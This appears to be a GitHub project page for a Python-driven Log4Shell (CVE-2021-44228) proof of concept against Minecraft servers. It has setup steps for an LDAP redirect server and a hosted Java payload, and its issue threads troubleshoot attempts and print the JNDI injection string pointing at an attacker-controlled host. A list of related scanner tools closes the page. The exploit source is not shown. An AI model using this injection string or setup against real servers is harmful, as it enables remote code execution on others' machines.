Log4j minecraft with python

Overview

log4jminecraft

This code DOES NOT promote or encourage any illegal activities! The content in this document is provided solely for educational purposes and to create awareness!

To run this project follow the following steps:

  1. Clone the repository: git clone https://github.com/davidbombal/log4jminecraft.git
  2. Run the script log4j.py (python3 log4j.py <ip_address> i.e. python3 log4j.py 192.168.1.132). This installs the prerequisite software, and also starts up the LDAP server.
  3. Run the script jcomp_pyserv.py (python3 jcomp_pyserv.py). This compiles the Java payload to be ran, and also starts a python3 http.server.

Acknowledgement for contributions:

Comments
  • The request does not reach the HTTP server.

    The request does not reach the HTTP server.

    Hello! Thank you very much for your work! As shown in the video, I deployed both python codes on Ubuntu 20.04 LTS using the Linode service, everything worked and it was written in one terminal: Listening on 0.0.0.0:1389 And in the other:

    root@localhost:~/log4jminecraft# python3 jcomp_pyserv.py
    Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
    

    I also created a Minecraft server on my PC at version 1.18.1(at first) and installed the Java Kit. After that I changed the variable in server.properties: online-mode=false I need this so that I can log in to the server with TLauncher.

    After that, I entered the command in minecraft: ${jndi:ldap://LINODE_SERVER_IP:1389/Log4JCE} Nothing worked on version 1.18.1.

    I also tried it on versions 1.17.1 and 1.8.8 (as in the video). In these cases, the LDAP signal reaches the server: image But on the server with Minecraft there is a long error:

    [13:27:52] [Server thread/INFO]: Done (0,720s)! For help, type "help" or "?"
    [13:27:59] [Server thread/INFO]: maxet24[/192.168.56.1:29255] logged in with entity id 310 at (-245.78230860708862, 71.0, 115.72254226147197)
    [13:27:59] [Server thread/INFO]: maxet24 joined the game
    2021-12-19 13:29:20,809 ERROR An exception occurred processing Appender SysOut java.lang.ClassCastException: class javax.naming.Reference cannot be cast to class java.lang.String (javax.naming.Reference is in module java.naming of loader 'bootstrap'; java.lang.String is in module java.base of loader 'bootstrap')
            at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:58)
            at org.apache.logging.log4j.core.lookup.Interpolator.lookup(Interpolator.java:121)
            at org.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable(StrSubstitutor.java:904)
            at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:825)
            at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:737)
            at org.apache.logging.log4j.core.lookup.StrSubstitutor.replace(StrSubstitutor.java:306)
            at org.apache.logging.log4j.core.pattern.MessagePatternConverter.format(MessagePatternConverter.java:71)
            at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.java:36)
            at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.java:167)
            at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.java:52)
            at org.apache.logging.log4j.core.layout.AbstractStringLayout.toByteArray(AbstractStringLayout.java:45)
            at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.append(AbstractOutputStreamAppender.java:111)
            at org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderControl.java:99)
            at org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.java:425)
            at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:406)
            at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:367)
            at org.apache.logging.log4j.core.Logger.log(Logger.java:110)
            at org.apache.logging.log4j.spi.AbstractLogger.info(AbstractLogger.java:1011)
            at net.minecraft.server.MinecraftServer.a(SourceFile:871)
            at lx.a(SourceFile:782)
            at lm.a(SourceFile:680)
            at ie.a(SourceFile:37)
            at ie.a(SourceFile:9)
            at fh$1.run(SourceFile:13)
            at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
            at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
            at g.a(SourceFile:44)
            at net.minecraft.server.MinecraftServer.B(SourceFile:579)
            at ko.B(SourceFile:299)
            at net.minecraft.server.MinecraftServer.A(SourceFile:535)
            at net.minecraft.server.MinecraftServer.run(SourceFile:451)
            at java.base/java.lang.Thread.run(Thread.java:833)
    
    2021-12-19 13:29:20,974 ERROR An exception occurred processing Appender File java.lang.ClassCastException: class javax.naming.Reference cannot be cast to class java.lang.String (javax.naming.Reference is in module java.naming of loader 'bootstrap'; java.lang.String is in module java.base of loader 'bootstrap')
            at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:58)
            at org.apache.logging.log4j.core.lookup.Interpolator.lookup(Interpolator.java:121)
            at org.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable(StrSubstitutor.java:904)
            at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:825)
            at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:737)
            at org.apache.logging.log4j.core.lookup.StrSubstitutor.replace(StrSubstitutor.java:306)
            at org.apache.logging.log4j.core.pattern.MessagePatternConverter.format(MessagePatternConverter.java:71)
            at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.java:36)
            at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.java:167)
            at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.java:52)
            at org.apache.logging.log4j.core.layout.AbstractStringLayout.toByteArray(AbstractStringLayout.java:45)
            at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.append(AbstractOutputStreamAppender.java:111)
            at org.apache.logging.log4j.core.appender.RollingRandomAccessFileAppender.append(RollingRandomAccessFileAppender.java:96)
            at org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderControl.java:99)
            at org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.java:425)
            at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:406)
            at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:367)
            at org.apache.logging.log4j.core.Logger.log(Logger.java:110)
            at org.apache.logging.log4j.spi.AbstractLogger.info(AbstractLogger.java:1011)
            at net.minecraft.server.MinecraftServer.a(SourceFile:871)
            at lx.a(SourceFile:782)
            at lm.a(SourceFile:680)
            at ie.a(SourceFile:37)
            at ie.a(SourceFile:9)
            at fh$1.run(SourceFile:13)
            at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
            at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
            at g.a(SourceFile:44)
            at net.minecraft.server.MinecraftServer.B(SourceFile:579)
            at ko.B(SourceFile:299)
            at net.minecraft.server.MinecraftServer.A(SourceFile:535)
            at net.minecraft.server.MinecraftServer.run(SourceFile:451)
            at java.base/java.lang.Thread.run(Thread.java:833)
    
    2021-12-19 13:29:21,141 ERROR An exception occurred processing Appender ServerGuiConsole java.lang.ClassCastException: class javax.naming.Reference cannot be cast to class java.lang.String (javax.naming.Reference is in module java.naming of loader 'bootstrap'; java.lang.String is in module java.base of loader 'bootstrap')
            at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:58)
            at org.apache.logging.log4j.core.lookup.Interpolator.lookup(Interpolator.java:121)
            at org.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable(StrSubstitutor.java:904)
            at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:825)
            at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:737)
            at org.apache.logging.log4j.core.lookup.StrSubstitutor.replace(StrSubstitutor.java:306)
            at org.apache.logging.log4j.core.pattern.MessagePatternConverter.format(MessagePatternConverter.java:71)
            at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.java:36)
            at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.java:167)
            at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.java:52)
            at com.mojang.util.QueueLogAppender.append(QueueLogAppender.java:39)
            at org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderControl.java:99)
            at org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.java:425)
            at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:406)
            at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:367)
            at org.apache.logging.log4j.core.Logger.log(Logger.java:110)
            at org.apache.logging.log4j.spi.AbstractLogger.info(AbstractLogger.java:1011)
            at net.minecraft.server.MinecraftServer.a(SourceFile:871)
            at lx.a(SourceFile:782)
            at lm.a(SourceFile:680)
            at ie.a(SourceFile:37)
            at ie.a(SourceFile:9)
            at fh$1.run(SourceFile:13)
            at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
            at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
            at g.a(SourceFile:44)
            at net.minecraft.server.MinecraftServer.B(SourceFile:579)
            at ko.B(SourceFile:299)
            at net.minecraft.server.MinecraftServer.A(SourceFile:535)
            at net.minecraft.server.MinecraftServer.run(SourceFile:451)
            at java.base/java.lang.Thread.run(Thread.java:833)
    
    [13:29:21] [Server thread/FATAL]: Error executing task
    java.util.concurrent.ExecutionException: org.apache.logging.log4j.core.appender.AppenderLoggingException: An exception occurred processing Appender ServerGuiConsole
            at java.base/java.util.concurrent.FutureTask.report(FutureTask.java:122) ~[?:?]
            at java.base/java.util.concurrent.FutureTask.get(FutureTask.java:191) ~[?:?]
            at g.a(SourceFile:45) [minecraft_server.1.8.8.jar:?]
            at net.minecraft.server.MinecraftServer.B(SourceFile:579) [minecraft_server.1.8.8.jar:?]
            at ko.B(SourceFile:299) [minecraft_server.1.8.8.jar:?]
            at net.minecraft.server.MinecraftServer.A(SourceFile:535) [minecraft_server.1.8.8.jar:?]
            at net.minecraft.server.MinecraftServer.run(SourceFile:451) [minecraft_server.1.8.8.jar:?]
            at java.base/java.lang.Thread.run(Thread.java:833) [?:?]
    Caused by: org.apache.logging.log4j.core.appender.AppenderLoggingException: An exception occurred processing Appender ServerGuiConsole
            at org.apache.logging.log4j.core.appender.DefaultErrorHandler.error(DefaultErrorHandler.java:73) ~[minecraft_server.1.8.8.jar:?]
            at org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderControl.java:101) ~[minecraft_server.1.8.8.jar:?]
            at org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.java:425) ~[minecraft_server.1.8.8.jar:?]
            at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:406) ~[minecraft_server.1.8.8.jar:?]
            at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:367) [minecraft_server.1.8.8.jar:?]
            at org.apache.logging.log4j.core.Logger.log(Logger.java:110) [minecraft_server.1.8.8.jar:?]
            at org.apache.logging.log4j.spi.AbstractLogger.info(AbstractLogger.java:1011) [minecraft_server.1.8.8.jar:?]
            at net.minecraft.server.MinecraftServer.a(SourceFile:871) ~[minecraft_server.1.8.8.jar:?]
            at lx.a(SourceFile:782) ~[minecraft_server.1.8.8.jar:?]
            at lm.a(SourceFile:680) ~[minecraft_server.1.8.8.jar:?]
            at ie.a(SourceFile:37) ~[minecraft_server.1.8.8.jar:?]
            at ie.a(SourceFile:9) ~[minecraft_server.1.8.8.jar:?]
            at fh$1.run(SourceFile:13) ~[minecraft_server.1.8.8.jar:?]
            at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539) ~[?:?]
            at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264) ~[?:?]
            at g.a(SourceFile:44) ~[minecraft_server.1.8.8.jar:?]
            ... 5 more
    Caused by: java.lang.ClassCastException: class javax.naming.Reference cannot be cast to class java.lang.String (javax.naming.Reference is in module java.naming of loader 'bootstrap'; java.lang.String is in module java.base of loader 'bootstrap')
            at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:58) ~[minecraft_server.1.8.8.jar:?]
            at org.apache.logging.log4j.core.lookup.Interpolator.lookup(Interpolator.java:121) ~[minecraft_server.1.8.8.jar:?]
            at org.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable(StrSubstitutor.java:904) ~[minecraft_server.1.8.8.jar:?]
            at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:825) ~[minecraft_server.1.8.8.jar:?]
            at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:737) ~[minecraft_server.1.8.8.jar:?]
            at org.apache.logging.log4j.core.lookup.StrSubstitutor.replace(StrSubstitutor.java:306) ~[minecraft_server.1.8.8.jar:?]
            at org.apache.logging.log4j.core.pattern.MessagePatternConverter.format(MessagePatternConverter.java:71) ~[minecraft_server.1.8.8.jar:?]
            at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.java:36) ~[minecraft_server.1.8.8.jar:?]
            at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.java:167) ~[minecraft_server.1.8.8.jar:?]
            at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.java:52) ~[minecraft_server.1.8.8.jar:?]
            at com.mojang.util.QueueLogAppender.append(QueueLogAppender.java:39) ~[minecraft_server.1.8.8.jar:?]
            at org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderControl.java:99) ~[minecraft_server.1.8.8.jar:?]
            at org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.java:425) ~[minecraft_server.1.8.8.jar:?]
            at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:406) ~[minecraft_server.1.8.8.jar:?]
            at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:367) ~[minecraft_server.1.8.8.jar:?]
            at org.apache.logging.log4j.core.Logger.log(Logger.java:110) ~[minecraft_server.1.8.8.jar:?]
            at org.apache.logging.log4j.spi.AbstractLogger.info(AbstractLogger.java:1011) ~[minecraft_server.1.8.8.jar:?]
            at net.minecraft.server.MinecraftServer.a(SourceFile:871) ~[minecraft_server.1.8.8.jar:?]
            at lx.a(SourceFile:782) ~[minecraft_server.1.8.8.jar:?]
            at lm.a(SourceFile:680) ~[minecraft_server.1.8.8.jar:?]
            at ie.a(SourceFile:37) ~[minecraft_server.1.8.8.jar:?]
            at ie.a(SourceFile:9) ~[minecraft_server.1.8.8.jar:?]
            at fh$1.run(SourceFile:13) ~[minecraft_server.1.8.8.jar:?]
            at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539) ~[?:?]
            at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264) ~[?:?]
            at g.a(SourceFile:44) ~[minecraft_server.1.8.8.jar:?]
            ... 5 more
    [13:30:17] [Server thread/INFO]: maxet24 lost connection: TextComponent{text='Disconnected', siblings=[], style=Style{hasParent=false, color=null, bold=null, italic=null, underlined=null, obfuscated=null, clickEvent=null, hoverEvent=null, insertion=null}}
    

    Nothing reached the HTTP server. image

    opened by Maxet24 13
  • ldap server can't reach http server

    ldap server can't reach http server

    image

    image

    ldap and http are on the same server. I can access http server cia the web (it shows all files and I can download them), but ldap connections doesn't make it to the http.

    Writing in chat: ${jndi:ldap://xxx.xxx.xxx.xxx:1389/Log4jRCE} gives to the console: image

    opened by ItsVaidas 11
  • error python3 jcomp_pyserv.py

    error python3 jcomp_pyserv.py

    Traceback (most recent call last): File "jcomp_pyserv.py", line 9, in subprocess.run(["javac", "Log4jRCE.java"]) File "/usr/lib/python3.8/subprocess.py", line 493, in run with Popen(*popenargs, **kwargs) as process: File "/usr/lib/python3.8/subprocess.py", line 858, in init self._execute_child(args, executable, preexec_fn, close_fds, File "/usr/lib/python3.8/subprocess.py", line 1704, in _execute_child raise child_exception_type(errno_num, err_msg, err_filename) FileNotFoundError: [Errno 2] No such file or directory: 'javac'

    opened by congaterori 3
  • "Reference Class Name: foo"

    It might not be an issue of the POC, but I get this message whenever I try to use it with a Minecraft 1.15.2 server:

    [18:40:51] [Server thread/INFO]: Reference Class Name: foo

    🤯

    opened by ehguille 1
  • Could not find or load main class marshalsec.jndi.LDAPRefServer

    Could not find or load main class marshalsec.jndi.LDAPRefServer

    fatal: destination path 'marshalsec' already exists and is not an empty directory.
    ['src', 'LICENSE.txt', '.gitignore', 'README.md', 'marshalsec.pdf', 'pom.xml', '.git']
    Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
    Error: Could not find or load main class marshalsec.jndi.LDAPRefServer
    Caused by: java.lang.ClassNotFoundException: marshalsec.jndi.LDAPRefServer
    

    I don't know why I am getting this error please help! I just installed all the stuff on a Kali virtuall machine.

    opened by Benomat 0
  • Refine Java setup to be backward compatible

    Refine Java setup to be backward compatible

    Java installation would skip if a newer version of Java is installed. Now we check for the specific java file needed. Also will no longer change the system's symbolic links to keep a lower impact workspace and call the java file directly instead

    opened by ehlewis 0
  • Ldap server to http server redirection error

    Ldap server to http server redirection error

    I have followed all the steps correctly and have almost gotten there. I hosted a vulnerable minecraft server on my pc in the same network, connected to it, and ran the ${jndi:ldap://:port/log4jRCE} (not accurate) code in the minecraft chat. I get to see an ldap server reply thrice on my kali vm but nothing on the web server terminal and the netcat terminal window

    Any fixes? Thanks.

    opened by NotMifa 1
Owner
David Bombal
Author, Instructor and YouTuber
David Bombal
Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading

log4j-detect Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading The script

Víctor García 187 Jan 3, 2023
Python script that sends CVE-2021-44228 log4j payload requests to url list

scan4log4j Python script that sends CVE-2021-44228 log4j payload requests to url list [VERY BETA] using Supply your url list to urls.txt Put your payl

elyesa 5 Nov 9, 2022
Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading

log4j-detect Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading The script

Wade 1 Dec 15, 2021
Python script to tamper with pages to test for Log4J Shell vulnerability.

log4jShell Scanner This shell script scans a vulnerable web application that is using a version of apache-log4j < 2.15.0. This application is a static

GoVanguard 8 Oct 20, 2022
This python script will automate the testing for the Log4J vulnerability for HTTP and HTTPS connections.

Log4J-Huntress-Automate-Script This python script will automate the testing for the Log4J vulnerability for HTTP and HTTPS connections. Pre-Requisits

null 1 Dec 16, 2021
A Python Scanner for log4j

log4j-Scanner scanner for log4j cat web-urls.txt | python3 log4j.py <ID>.burpcollaborator.net web-urls.txt http://127.0.0.1:8080 https://www.google.c

Ihebski 5 Jun 26, 2022
Log4j vuln fuzz/scan with python

Log4jFuzz log4j vuln fuzz/scan USE // it's use localhost udp server to check target vuln. python3 log4jFuzz.py [option] optional arguments: -u URL,

VVzv 3 Dec 22, 2021
Northwave Log4j CVE-2021-44228 checker

Northwave Log4j CVE-2021-44228 checker Friday 10 December 2021 a new Proof-of-Concept 1 addressing a Remote code Execution (RCE) vulnerability in the

Northwave 125 Dec 9, 2022
log4j burp scanner

log4jscanner log4j burp插件 特点如下: 0x01 基于Cookie字段、XFF头字段、UA头字段发送payload 0x02 基于域名的唯一性,将host带入dnslog中 插件主要识别五种形式: 1.get请求,a=1&b=2&c=3 2.post请求,a=1&b=2&c=

null 1 Jun 30, 2022
Log4j exploit catcher, detect Log4Shell exploits and try to get payloads.

log4j_catcher Log4j exploit catcher, detect Log4Shell exploits and try to get payloads. This is a basic python server that listen on a port and logs i

EntropyQueen 17 Dec 20, 2021
Script checks provided domains for log4j vulnerability

log4j Script checks provided domains for log4j vulnerability. A token is created with canarytokens.org and passed as header at request for a single do

Matthias Nehls 2 Dec 12, 2021
A proof-of-concept exploit for Log4j RCE Unauthenticated (CVE-2021-44228)

CVE-2021-44228 – Log4j RCE Unauthenticated About This is a proof-of-concept exploit for Log4j RCE Unauthenticated (CVE-2021-44228). This vulnerability

Pedro Havay 20 Nov 11, 2022
Mass Check Vulnerable Log4j CVE-2021-44228

Log4j-CVE-2021-44228 Mass Check Vulnerable Log4j CVE-2021-44228 Introduction Actually I just checked via Vulnerable Application from https://github.co

Justakazh 6 Dec 28, 2022
Log4j-Scanner with Bind-Receipt and custom hostnames

Hrafna - Log4j-Scanner for the masses Features Scanning-system designed to check your own infra for vulnerable log4j-installations start and stop scan

null 18 Jan 23, 2022
Internal network honeypot for detecting if an attacker or insider threat scans your network for log4j CVE-2021-44228

log4j-honeypot-flask Internal network honeypot for detecting if an attacker or insider threat scans your network for log4j CVE-2021-44228 This can be

Binary Defense 144 Nov 19, 2022
Tools for investigating Log4j CVE-2021-44228

Log4jTools Tools for investigating Log4j CVE-2021-44228 FetchPayload.py (Get java payload from ldap path provided in JNDI lookup). Example command: Re

MalwareTech 91 Dec 29, 2022
A simple automatic tool for finding vulnerable log4j hosts

Log4Scan A simple automatic tool for finding vulnerable log4j hosts Installation pip3 install -r requirements.txt Usage usage: log4scan.py [-h] (-f FI

Federico Rapetti 20018955 6 Mar 10, 2022
Log4j rce test environment and poc

log4jpwn log4j rce test environment See: https://www.lunasec.io/docs/blog/log4j-zero-day/ Experiments to trigger in various software products mentione

Leon Jacobs 307 Dec 24, 2022
POC for detecting the Log4Shell (Log4J RCE) vulnerability.

log4shell-poc-py POC for detecting the Log4Shell (Log4J RCE) vulnerability. Run on a system with python3 python3 log4shell-poc.py <pathToTargetFile> <

BCC Risk Advisory 2 Dec 22, 2021